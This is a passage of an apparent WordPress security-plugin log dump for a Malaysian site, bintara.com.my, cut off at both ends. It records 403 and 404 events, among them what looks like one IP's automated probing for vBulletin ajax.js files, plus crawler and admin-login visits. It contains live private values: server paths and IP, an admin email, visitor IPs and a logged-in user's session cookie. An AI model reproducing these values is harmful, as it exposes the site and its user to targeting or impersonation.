16:16:56',35182592,36992168,'https://bintara.com.my/vBulletin/js/ajax.js',1,0,'51.255.43.81'),(27364,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/vb5/js/ajax.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/vb5/js/ajax.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/vb5/js/ajax.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIq0o3U6542i46IOG7GxAAAAEs\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/vb5/js/ajax.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/vb5/js/ajax.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIq0o3U6542i46IOG7GxAAAAEs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"35074\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/vb5/js/ajax.js\";s:10:\"SCRIPT_URL\";s:15:\"/vb5/js/ajax.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIq0o3U6542i46IOG7GxAAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569860307.0404\";s:12:\"REQUEST_TIME\";s:10:\"1569860307\";}}','notice','2019-09-30 16:18:29','2019-09-30 16:18:27',35182696,36984208,'https://bintara.com.my/vb5/js/ajax.js',1,0,'51.255.43.81'),(27365,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/vbforum/js/ajax.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/vbforum/js/ajax.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/vbforum/js/ajax.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIrDFRs5rARLtASNcvrrgAAABE\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/vbforum/js/ajax.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/vbforum/js/ajax.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIrDFRs5rARLtASNcvrrgAAABE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"41205\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"https://bintara.com.my/vbforum/js/ajax.js\";s:10:\"SCRIPT_URL\";s:19:\"/vbforum/js/ajax.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIrDFRs5rARLtASNcvrrgAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569860365.0156\";s:12:\"REQUEST_TIME\";s:10:\"1569860365\";}}','notice','2019-09-30 16:19:27','2019-09-30 16:19:25',35181784,36989288,'https://bintara.com.my/vbforum/js/ajax.js',1,0,'51.255.43.81'),(27366,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/forum/js/ajax.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/forum/js/ajax.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/forum/js/ajax.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIrPI3U6542i46IOG7G2QAAAEU\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/forum/js/ajax.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/forum/js/ajax.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIrPI3U6542i46IOG7G2QAAAEU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"46442\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/forum/js/ajax.js\";s:10:\"SCRIPT_URL\";s:17:\"/forum/js/ajax.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIrPI3U6542i46IOG7G2QAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569860412.782\";s:12:\"REQUEST_TIME\";s:10:\"1569860412\";}}','notice','2019-09-30 16:20:17','2019-09-30 16:20:13',35180872,36977760,'https://bintara.com.my/forum/js/ajax.js',1,0,'51.255.43.81'),(27367,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/js/ajax.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/js/ajax.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/js/ajax.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIrTI3U6542i46IOG7G3wAAAEE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/js/ajax.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/js/ajax.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIrTI3U6542i46IOG7G3wAAAEE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"48255\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/js/ajax.js\";s:10:\"SCRIPT_URL\";s:11:\"/js/ajax.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIrTI3U6542i46IOG7G3wAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569860429.0243\";s:12:\"REQUEST_TIME\";s:10:\"1569860429\";}}','notice','2019-09-30 16:20:32','2019-09-30 16:20:29',35180416,36993664,'https://bintara.com.my/js/ajax.js',1,0,'51.255.43.81'),(27338,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFvaae6fKO2vmuLqIB0MQAAAJU\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.142.11\";s:11:\"REMOTE_PORT\";s:5:\"36366\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFvaae6fKO2vmuLqIB0MQAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569812329.9628\";s:12:\"REQUEST_TIME\";s:10:\"1569812329\";}}','notice','2019-09-30 02:58:52','2019-09-30 02:58:50',34450480,36251048,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'141.8.142.11'),(27337,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:66:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"5\";s:13:\"H2_STREAM_TAG\";s:5:\"387-5\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:248:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wp-settings-time-1=1569484198; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"5\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"387-5\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZFm8pdbIPYXuQos2m1UwQAAAAU\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFm8pdbIPYXuQos2m1UwQAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"50340\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZFm8pdbIPYXuQos2m1UwQAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569810163.0532\";s:12:\"REQUEST_TIME\";s:10:\"1569810163\";}}','notice','2019-09-30 02:22:44','2019-09-30 02:22:43',35159032,36958328,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.142.118.43'),(27336,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:75:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-admin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"262-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:248:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wp-settings-time-1=1569484198; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"262-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"262-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-admin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZFmm4JA@BHzIZKM8@MItAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-admin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZFmm4JA@BHzIZKM8@MItAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.118.43\";s:11:\"REMOTE_PORT\";s:5:\"50330\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-admin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/